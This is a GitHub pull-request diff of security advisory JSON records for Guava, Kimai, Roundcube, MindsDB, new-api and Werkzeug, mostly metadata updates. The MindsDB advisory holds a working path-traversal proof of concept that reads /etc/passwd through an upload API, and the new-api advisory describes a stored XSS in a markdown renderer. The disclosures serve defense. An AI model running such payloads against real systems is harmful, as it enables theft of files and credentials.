Skip to content
Closed
Show file tree
Hide file tree
Changes from all commits
Commits
Show all changes
77 commits
Select commit Hold shift + click to select a range
2a4cc40
Advisory Database Sync
advisory-database[bot] Feb 20, 2026
03399a2
Publish Advisories
advisory-database[bot] Feb 20, 2026
8b38a69
Publish Advisories
advisory-database[bot] Feb 20, 2026
86b2861
Publish Advisories
advisory-database[bot] Feb 20, 2026
7b0594e
Publish Advisories
advisory-database[bot] Feb 20, 2026
f9e9f64
Publish Advisories
advisory-database[bot] Feb 20, 2026
e4ed87a
Publish Advisories
advisory-database[bot] Feb 20, 2026
da86798
Publish Advisories
advisory-database[bot] Feb 20, 2026
4f3178c
Publish Advisories
advisory-database[bot] Feb 20, 2026
f6494f1
Publish Advisories
advisory-database[bot] Feb 20, 2026
f0ae703
Publish Advisories
advisory-database[bot] Feb 20, 2026
9e37ed4
Publish GHSA-qqhf-pm3j-96g7
advisory-database[bot] Feb 20, 2026
6ecbb5d
Publish Advisories
advisory-database[bot] Feb 20, 2026
5c53a25
Publish Advisories
advisory-database[bot] Feb 20, 2026
2112e7a
Advisory Database Sync
advisory-database[bot] Feb 20, 2026
16b4db1
Publish GHSA-2ww3-72rp-wpp4
advisory-database[bot] Feb 20, 2026
1f80578
Publish Advisories
advisory-database[bot] Feb 20, 2026
4d1cb89
Publish Advisories
advisory-database[bot] Feb 20, 2026
c06dd00
Publish GHSA-2g4f-4pwh-qvx6
advisory-database[bot] Feb 20, 2026
abeec1b
Publish GHSA-wh94-p5m6-mr7j
advisory-database[bot] Feb 20, 2026
4892a03
Publish GHSA-r6h2-5gqq-v5v6
advisory-database[bot] Feb 20, 2026
ef3ccde
Publish GHSA-w45g-5746-x9fp
advisory-database[bot] Feb 20, 2026
caae1cc
Publish Advisories
advisory-database[bot] Feb 20, 2026
15ca792
Publish GHSA-378v-28hj-76wf
advisory-database[bot] Feb 20, 2026
f9abce7
Advisory Database Sync
advisory-database[bot] Feb 20, 2026
ebf4870
Publish GHSA-6qr9-g2xw-cw92
advisory-database[bot] Feb 20, 2026
3c5089d
Publish GHSA-8j8w-wwqc-x596
advisory-database[bot] Feb 20, 2026
d19ea1e
Publish GHSA-cxpw-2g23-2vgw
advisory-database[bot] Feb 20, 2026
a8170f7
Publish Advisories
advisory-database[bot] Feb 20, 2026
583028d
Publish Advisories
advisory-database[bot] Feb 20, 2026
7b171aa
Publish Advisories
advisory-database[bot] Feb 20, 2026
c0da40a
Advisory Database Sync
advisory-database[bot] Feb 21, 2026
4a25af6
Publish GHSA-gfw7-2v73-69wg
advisory-database[bot] Feb 21, 2026
715a73b
Publish Advisories
advisory-database[bot] Feb 21, 2026
1cb2f15
Publish Advisories
advisory-database[bot] Feb 21, 2026
b81a27c
Publish Advisories
advisory-database[bot] Feb 21, 2026
44095bd
Publish Advisories
advisory-database[bot] Feb 21, 2026
30c3276
Publish Advisories
advisory-database[bot] Feb 21, 2026
6fbb688
Publish Advisories
advisory-database[bot] Feb 21, 2026
493d991
Publish Advisories
advisory-database[bot] Feb 22, 2026
9632124
Publish Advisories
advisory-database[bot] Feb 22, 2026
1b8b37e
Publish Advisories
advisory-database[bot] Feb 22, 2026
5552854
Publish Advisories
advisory-database[bot] Feb 22, 2026
2ab36c6
Publish Advisories
advisory-database[bot] Feb 22, 2026
a53df6e
Publish Advisories
advisory-database[bot] Feb 22, 2026
90d3ff7
Publish Advisories
advisory-database[bot] Feb 22, 2026
241db5f
Publish Advisories
advisory-database[bot] Feb 22, 2026
03f1c80
Publish Advisories
advisory-database[bot] Feb 23, 2026
ace7bff
Publish Advisories
advisory-database[bot] Feb 23, 2026
395d01f
Advisory Database Sync
advisory-database[bot] Feb 23, 2026
a1043d8
Advisory Database Sync
advisory-database[bot] Feb 23, 2026
f58705f
Advisory Database Sync
advisory-database[bot] Feb 23, 2026
d56d988
Publish Advisories
advisory-database[bot] Feb 23, 2026
153075b
Advisory Database Sync
advisory-database[bot] Feb 23, 2026
8bd7c1f
Advisory Database Sync
advisory-database[bot] Feb 23, 2026
86cca5d
Publish GHSA-qq67-mvv5-fw3g
advisory-database[bot] Feb 23, 2026
e323cf2
Publish GHSA-w6x6-9fp7-fqm4
advisory-database[bot] Feb 23, 2026
ee45bba
Publish GHSA-299v-8pq9-5gjq
advisory-database[bot] Feb 23, 2026
131b189
Publish GHSA-xxh2-68g9-8jqr
advisory-database[bot] Feb 23, 2026
4088f0c
Publish Advisories
advisory-database[bot] Feb 23, 2026
819404a
Publish Advisories
advisory-database[bot] Feb 23, 2026
2f2f37a
Publish Advisories
advisory-database[bot] Feb 23, 2026
895a0c3
Publish Advisories
advisory-database[bot] Feb 23, 2026
c4a8d9a
Publish Advisories
advisory-database[bot] Feb 23, 2026
66ce563
Publish Advisories
advisory-database[bot] Feb 23, 2026
df24333
Publish Advisories
advisory-database[bot] Feb 23, 2026
bc90ce7
Publish Advisories
advisory-database[bot] Feb 23, 2026
661e2a1
Publish GHSA-r6v5-fh4h-64xc
advisory-database[bot] Feb 23, 2026
60eb5cc
Publish GHSA-mjjp-xjfg-97wg
advisory-database[bot] Feb 23, 2026
cdb3c51
Publish GHSA-2g4f-4pwh-qvx6
advisory-database[bot] Feb 23, 2026
25b7d8a
Publish GHSA-5mg8-w23w-74h3
advisory-database[bot] Feb 23, 2026
b6c5c52
Advisory Database Sync
advisory-database[bot] Feb 24, 2026
bb98158
Publish Advisories
advisory-database[bot] Feb 24, 2026
98d3857
Publish Advisories
advisory-database[bot] Feb 24, 2026
19beec9
Advisory Database Sync
advisory-database[bot] Feb 24, 2026
5e588eb
Publish Advisories
advisory-database[bot] Feb 24, 2026
8be3abb
Publish Advisories
advisory-database[bot] Feb 24, 2026
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
The table of contents is too big for display.
Diff view
Diff view
  •  
  •  
  •  
Original file line number Diff line number Diff line change
@@ -1,13 +1,13 @@
{
"schema_version": "1.4.0",
"id": "GHSA-5mg8-w23w-74h3",
"modified": "2023-08-18T15:56:36Z",
"modified": "2026-02-23T22:45:53Z",
"published": "2021-03-25T17:04:19Z",
"aliases": [
"CVE-2020-8908"
],
"summary": "Information Disclosure in Guava",
"details": "A temp directory creation vulnerability exists in Guava prior to version 32.0.0 allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava `com.google.common.io.Files.createTempDir()`. The permissions granted to the directory created default to the standard unix-like /tmp ones, leaving the files open. Maintainers recommend explicitly changing the permissions after the creation of the directory, or removing uses of the vulnerable method.\n",
"details": "A temp directory creation vulnerability exists in Guava prior to version 32.0.0 allowing an attacker with access to the machine to potentially access data in a temporary directory created by the Guava `com.google.common.io.Files.createTempDir()`. The permissions granted to the directory created default to the standard unix-like /tmp ones, leaving the files open. Maintainers recommend explicitly changing the permissions after the creation of the directory, or removing uses of the vulnerable method.",
"severity": [
{
"type": "CVSS_V3",
Expand Down
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-8v38-pw62-9cw2",
"modified": "2025-12-20T03:15:43Z",
"modified": "2026-02-20T19:56:16Z",
"published": "2022-02-18T00:00:33Z",
"aliases": [
"CVE-2022-0639"
Expand All @@ -25,7 +25,7 @@
"type": "ECOSYSTEM",
"events": [
{
"introduced": "0"
"introduced": "1.0.0"
},
{
"fixed": "1.5.7"
Expand Down
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-rqff-837h-mm52",
"modified": "2022-02-24T14:00:06Z",
"modified": "2026-02-20T19:56:07Z",
"published": "2022-02-15T00:02:46Z",
"aliases": [
"CVE-2022-0512"
Expand All @@ -25,7 +25,7 @@
"type": "ECOSYSTEM",
"events": [
{
"introduced": "0"
"introduced": "0.1.0"
},
{
"fixed": "1.5.6"
Expand Down
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-pmc3-p9hx-jq96",
"modified": "2026-02-18T23:34:53Z",
"modified": "2026-02-20T16:51:12Z",
"published": "2025-04-23T14:43:44Z",
"aliases": [
"CVE-2026-26994"
Expand Down Expand Up @@ -40,6 +40,10 @@
"type": "WEB",
"url": "https://github.com/refraction-networking/utls/security/advisories/GHSA-pmc3-p9hx-jq96"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26994"
},
{
"type": "WEB",
"url": "https://github.com/refraction-networking/utls/issues/181"
Expand All @@ -64,6 +68,6 @@
"severity": "MODERATE",
"github_reviewed": true,
"github_reviewed_at": "2025-04-23T14:43:44Z",
"nvd_published_at": null
"nvd_published_at": "2026-02-20T03:16:01Z"
}
}
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-8j8w-wwqc-x596",
"modified": "2025-12-22T18:41:25Z",
"modified": "2026-02-20T21:48:11Z",
"published": "2025-06-02T06:30:32Z",
"aliases": [
"CVE-2025-49113"
Expand Down Expand Up @@ -99,6 +99,10 @@
"type": "WEB",
"url": "https://roundcube.net/news/2025/06/01/security-updates-1.6.11-and-1.5.10"
},
{
"type": "WEB",
"url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-49113"
},
{
"type": "WEB",
"url": "https://www.vicarius.io/vsociety/posts/cve-2025-49113-roundcube-mitigation-script"
Expand Down
Original file line number Diff line number Diff line change
@@ -1,11 +1,12 @@
{
"schema_version": "1.4.0",
"id": "GHSA-cv8h-r7r5-vwj9",
"modified": "2025-12-19T21:30:20Z",
"modified": "2026-02-20T18:25:02Z",
"published": "2025-12-19T21:30:20Z",
"aliases": [
"CVE-2023-53957"
],
"summary": "Kimai contains a SameSite cookie vulnerability",
"details": "Kimai 1.30.10 contains a SameSite cookie vulnerability that allows attackers to steal user session cookies through malicious exploitation. Attackers can trick victims into executing a crafted PHP script that captures and writes session cookie information to a file, enabling potential session hijacking.",
"severity": [
{
Expand All @@ -14,18 +15,38 @@
},
{
"type": "CVSS_V4",
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"
}
],
"affected": [
{
"package": {
"ecosystem": "Packagist",
"name": "kimai/kimai"
},
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "0"
},
{
"last_affected": "1.30.10"
}
]
}
]
}
],
"affected": [],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-53957"
},
{
"type": "WEB",
"url": "https://github.com/kimai/kimai/releases/tag/1.30.10"
"type": "PACKAGE",
"url": "https://github.com/kimai/kimai"
},
{
"type": "WEB",
Expand All @@ -41,8 +62,8 @@
"CWE-1275"
],
"severity": "HIGH",
"github_reviewed": false,
"github_reviewed_at": null,
"github_reviewed": true,
"github_reviewed_at": "2026-02-20T18:25:02Z",
"nvd_published_at": "2025-12-19T21:15:52Z"
}
}
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-mjjp-xjfg-97wg",
"modified": "2026-01-13T18:31:53Z",
"modified": "2026-02-23T22:38:58Z",
"published": "2026-01-10T12:30:16Z",
"aliases": [
"CVE-2025-15504"
Expand Down Expand Up @@ -102,7 +102,8 @@
],
"database_specific": {
"cwe_ids": [
"CWE-404"
"CWE-404",
"CWE-476"
],
"severity": "LOW",
"github_reviewed": true,
Expand Down
Original file line number Diff line number Diff line change
@@ -1,13 +1,13 @@
{
"schema_version": "1.4.0",
"id": "GHSA-qqhf-pm3j-96g7",
"modified": "2026-01-20T18:22:20Z",
"modified": "2026-02-20T16:54:21Z",
"published": "2026-01-12T16:10:55Z",
"aliases": [
"CVE-2025-68472"
],
"summary": "MindsDB has improper sanitation of filepath that leads to information disclosure and DOS",
"details": "### Summary\n\n[BlueRock](https://bluerock.io/) discovered an unauthenticated path traversal in the file upload API lets any caller read arbitrary files from the server filesystem and move them into MindsDB’s storage, exposing sensitive data. Severity: High.\n\n### Details\nThe PUT handler in file.py directly joins user-controlled data into a filesystem path when the request body is JSON and `source_type` is not `\"url\"`:\n\n- `data = request.json` (line ~104) accepts attacker input without validation.\n- `file_path = os.path.join(temp_dir_path, data[\"file\"])` (line ~178) creates the path inside a temporary directory, but if `data[\"file\"]` is absolute (e.g., `/home/secret.csv`), `os.path.join` ignores `temp_dir_path` and targets the attacker-specified location.\n- The resulting path is handed to `ca.file_controller.save_file(...)`, which wraps `FileReader(path=source_path)` (`mindsdb/interfaces/file/file_controller.py:66`), causing the application to read the contents of that arbitrary file. The subsequent `shutil.move(file_path, ...)` call also relocates the victim file into MindsDB’s managed storage.\n\nOnly multipart uploads and URL-sourced uploads receive sanitization; JSON uploads lack any call to `clear_filename` or equivalent checks.\n\n### PoC\n1. Run MindsDB in Docker:\n ```bash\n docker pull mindsdb/mindsdb:latest\n docker run --rm -it -p 47334:47334 --name mindsdb-poc mindsdb/mindsdb:latest\n ```\n2. Execute the exploit from the host (save as poc.py and run with `python poc.py`):\n ```python\n # poc.py\n import requests, json\n\n base = \"http://127.0.0.1:47334\"\n payload = {\"file\": \"../../../../../etc/passwd\"} # no source_type -> hits vulnerable branch\n\n r = requests.put(f\"{base}/api/files/leak_rel\", json=payload, timeout=10)\n print(\"PUT status:\", r.status_code, r.text)\n\n q = requests.post(\n f\"{base}/api/sql/query\",\n json={\"query\": \"SELECT * FROM files.leak_rel\"},\n timeout=10,\n )\n print(\"SQL response:\", json.dumps(q.json(), indent=2))\n ```\n3. The SQL response returns the contents of `/etc/passwd` . The original file disappears from its source location because the handler moves it into MindsDB’s storage directory.\n\n### Impact\n- Any user able to reach the REST API can read and exfiltrate arbitrary files that the MindsDB process can access, potentially including credentials, configuration secrets, and private keys.",
"details": "### Summary\n\n[BlueRock](https://bluerock.io/) discovered an unauthenticated path traversal in the file upload API lets any caller read arbitrary files from the server filesystem and move them into MindsDB’s storage, exposing sensitive data. \n\n### Details\nThe PUT handler in file.py directly joins user-controlled data into a filesystem path when the request body is JSON and `source_type` is not `\"url\"`:\n\n- `data = request.json` (line ~104) accepts attacker input without validation.\n- `file_path = os.path.join(temp_dir_path, data[\"file\"])` (line ~178) creates the path inside a temporary directory, but if `data[\"file\"]` is absolute (e.g., `/home/secret.csv`), `os.path.join` ignores `temp_dir_path` and targets the attacker-specified location.\n- The resulting path is handed to `ca.file_controller.save_file(...)`, which wraps `FileReader(path=source_path)` (`mindsdb/interfaces/file/file_controller.py:66`), causing the application to read the contents of that arbitrary file. The subsequent `shutil.move(file_path, ...)` call also relocates the victim file into MindsDB’s managed storage.\n\nOnly multipart uploads and URL-sourced uploads receive sanitization; JSON uploads lack any call to `clear_filename` or equivalent checks.\n\n### PoC\n1. Run MindsDB in Docker:\n ```bash\n docker pull mindsdb/mindsdb:latest\n docker run --rm -it -p 47334:47334 --name mindsdb-poc mindsdb/mindsdb:latest\n ```\n2. Execute the exploit from the host (save as poc.py and run with `python poc.py`):\n ```python\n # poc.py\n import requests, json\n\n base = \"http://127.0.0.1:47334\"\n payload = {\"file\": \"../../../../../etc/passwd\"} # no source_type -> hits vulnerable branch\n\n r = requests.put(f\"{base}/api/files/leak_rel\", json=payload, timeout=10)\n print(\"PUT status:\", r.status_code, r.text)\n\n q = requests.post(\n f\"{base}/api/sql/query\",\n json={\"query\": \"SELECT * FROM files.leak_rel\"},\n timeout=10,\n )\n print(\"SQL response:\", json.dumps(q.json(), indent=2))\n ```\n3. The SQL response returns the contents of `/etc/passwd` . The original file disappears from its source location because the handler moves it into MindsDB’s storage directory.\n4. Detailed report is available on BlueRock's blog: https://www.bluerock.io/post/cve-2025-68472-mindsdb-file-upload-path-traversal\n\n### Impact\n- Any user able to reach the REST API can read and exfiltrate arbitrary files that the MindsDB process can access, potentially including credentials, configuration secrets, and private keys.",
"severity": [
{
"type": "CVSS_V3",
Expand Down Expand Up @@ -51,6 +51,10 @@
{
"type": "WEB",
"url": "https://github.com/mindsdb/mindsdb/releases/tag/v25.11.1"
},
{
"type": "WEB",
"url": "https://www.bluerock.io/post/cve-2025-68472-mindsdb-file-upload-path-traversal"
}
],
"database_specific": {
Expand Down
Original file line number Diff line number Diff line change
@@ -0,0 +1,61 @@
{
"schema_version": "1.4.0",
"id": "GHSA-299v-8pq9-5gjq",
"modified": "2026-02-23T22:10:25Z",
"published": "2026-02-23T22:10:25Z",
"aliases": [
"CVE-2026-25802"
],
"summary": "New API has Potential XSS in its MarkdownRenderer component",
"details": "### Summary\n\nA potential unsafe operation occurs in component `MarkdownRenderer.jsx`, allowing for Cross-Site Scripting(XSS) when the model outputs items containing `<script>` tag.\n\n### Details\n\nLine 212-231 of `MarkdownRenderer.jsx` is unsafe, it use dangerouslySetInnerHTML to preview html the model generates. This can trigger malcious scripts.\n\n### PoC\n\nA simple way to exploit that is to ask the model in the playground, with prompt: \"请帮我写个脚本,跳转到google\", and then the browser will navigate to the google.com without user interference.\n\n### Impact\n\nPotential malcious activity to the user using playground, if the model api is altered to output unintended codes.\n\nAlso, users may not be easily rid the exploit, since the record of the chat containing XSS script is stored, once opening the page later, the script will be re-triggered.\n\n### Potential Workaround\n\nThe preview may be placed in an iframe sandbox, dangerous html strings should be purified before rendering.\n\n---\n\nThe reply generated for test is as below:\n\n这是一个为您编写的单页 HTML 文件。它使用了两种方式来实现跳转,以确保在任何情况下都能工作:\n\n1. **JavaScript (`window.location.replace`)**:这是最常用且高效的方法,它会立即跳转,并且不会保留当前页面在浏览器历史记录中(这样用户按“后退”键不会回到这个跳转页)。\n2. **HTML Meta Refresh**:作为后备方案。如果用户的浏览器禁用了 JavaScript,这个标签会在 1 秒后将用户带往 Google。\n3. **手动链接**:页面中显示了一个备用链接,以防自动跳转被拦截或失效。\n\n您可以直接保存以下代码为 `.html` 文件并在浏览器中打开。\n\n```html\n<!DOCTYPE html>\n<html lang=\"zh-CN\">\n<head>\n <meta charset=\"UTF-8\">\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\n <title>正在跳转至 Google...</title>\n \n <!-- 方法1:HTML Meta Refresh (如果JS被禁用,1秒后自动跳转) -->\n <meta http-equiv=\"refresh\" content=\"1;url=https://www.google.com\">\n\n <style>\n /* 基础重置与布局 */\n body, html {\n height: 100%;\n margin: 0;\n font-family: -apple-system, BlinkMacSystemFont, \"Segoe UI\", Roboto, \"Helvetica Neue\", Arial, sans-serif;\n background-color: #f8f9fa;\n color: #202124;\n display: flex;\n justify-content: center;\n align-items: center;\n }\n\n /* 卡片容器样式 */\n .redirect-card {\n background: white;\n padding: 2rem 3rem;\n border-radius: 12px;\n box-shadow: 0 4px 12px rgba(0, 0, 0, 0.1);\n text-align: center;\n max-width: 400px;\n width: 90%;\n }\n\n /* 加载动画圆圈 */\n .spinner {\n border: 4px solid #f3f3f3;\n border-top: 4px solid #4285f4; /* Google Blue */\n border-radius: 50%;\n width: 40px;\n height: 40px;\n animation: spin 1s linear infinite;\n margin: 0 auto 1.5rem auto;\n }\n\n /* 文本排版 */\n h1 {\n font-size: 1.25rem;\n margin-bottom: 0.5rem;\n font-weight: 500;\n }\n\n p {\n font-size: 0.95rem;\n color: #5f6368;\n margin-bottom: 1.5rem;\n line-height: 1.5;\n }\n\n /* 手动链接样式 */\n .manual-link {\n display: inline-block;\n color: #1a73e8; /* Google Link Blue */\n text-decoration: none;\n font-weight: 500;\n padding: 0.5rem 1rem;\n border: 1px solid #dadce0;\n border-radius: 4px;\n transition: background-color 0.2s;\n }\n\n .manual-link:hover {\n background-color: #f1f3f4;\n text-decoration: underline;\n }\n\n /* 动画定义 */\n @keyframes spin {\n 0% { transform: rotate(0deg); }\n 100% { transform: rotate(360deg); }\n }\n </style>\n</head>\n<body>\n\n <main class=\"redirect-card\">\n <!-- 视觉反馈:加载动画 -->\n <div class=\"spinner\"></div>\n \n <!-- 提示信息 -->\n <h1>正在为您跳转</h1>\n <p>我们正在将您引导至 Google。<br>如果页面没有自动刷新,请点击下方的按钮。</p>\n \n <!-- 手动跳转链接 -->\n <a href=\"https://www.google.com\" class=\"manual-link\">立即前往 Google</a>\n </main>\n\n <script>\n // 方法2:JavaScript 跳转 (推荐)\n // 使用 replace() 而不是 href,这样用户点击“后退”时不会死循环回到这个跳转页\n (function() {\n // 目标地址\n var targetUrl = \"https://www.google.com\";\n\n // 执行跳转\n window.location.replace(targetUrl);\n \n // 控制台日志(用于调试)\n console.log(\"Redirecting to: \" + targetUrl);\n })();\n </script>\n\n</body>\n</html>\n```\n\n### Acknowledgments\n\nQuantumNous would like to thank **TechnologyStar** for the early notification of this potential vulnerability via AI-assisted tools, and **small-lovely-cat** for providing additional context and an initial patch. The final fix was developed and verified by the maintainers to ensure full compatibility with the project's architecture.",
"severity": [
{
"type": "CVSS_V3",
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:H/A:L"
}
],
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/QuantumNous/new-api"
},
"ranges": [
{
"type": "ECOSYSTEM",
"events": [
{
"introduced": "0"
},
{
"fixed": "0.10.8-alpha.9"
}
]
}
]
}
],
"references": [
{
"type": "WEB",
"url": "https://github.com/QuantumNous/new-api/security/advisories/GHSA-299v-8pq9-5gjq"
},
{
"type": "WEB",
"url": "https://github.com/QuantumNous/new-api/commit/ab5456eb1049aa8a0f3e51f359907ec7fff38b4b"
},
{
"type": "PACKAGE",
"url": "https://github.com/QuantumNous/new-api"
}
],
"database_specific": {
"cwe_ids": [
"CWE-79"
],
"severity": "HIGH",
"github_reviewed": true,
"github_reviewed_at": "2026-02-23T22:10:25Z",
"nvd_published_at": null
}
}
Original file line number Diff line number Diff line change
@@ -1,7 +1,7 @@
{
"schema_version": "1.4.0",
"id": "GHSA-29vq-49wr-vm6x",
"modified": "2026-02-19T20:32:45Z",
"modified": "2026-02-23T22:27:37Z",
"published": "2026-02-19T20:32:45Z",
"aliases": [
"CVE-2026-27199"
Expand Down Expand Up @@ -40,6 +40,10 @@
"type": "WEB",
"url": "https://github.com/pallets/werkzeug/security/advisories/GHSA-29vq-49wr-vm6x"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27199"
},
{
"type": "WEB",
"url": "https://github.com/pallets/werkzeug/commit/f407712fdc60a09c2b3f4fe7db557703e5d9338d"
Expand All @@ -60,6 +64,6 @@
"severity": "MODERATE",
"github_reviewed": true,
"github_reviewed_at": "2026-02-19T20:32:45Z",
"nvd_published_at": null
"nvd_published_at": "2026-02-21T06:17:00Z"
}
}
Loading
Loading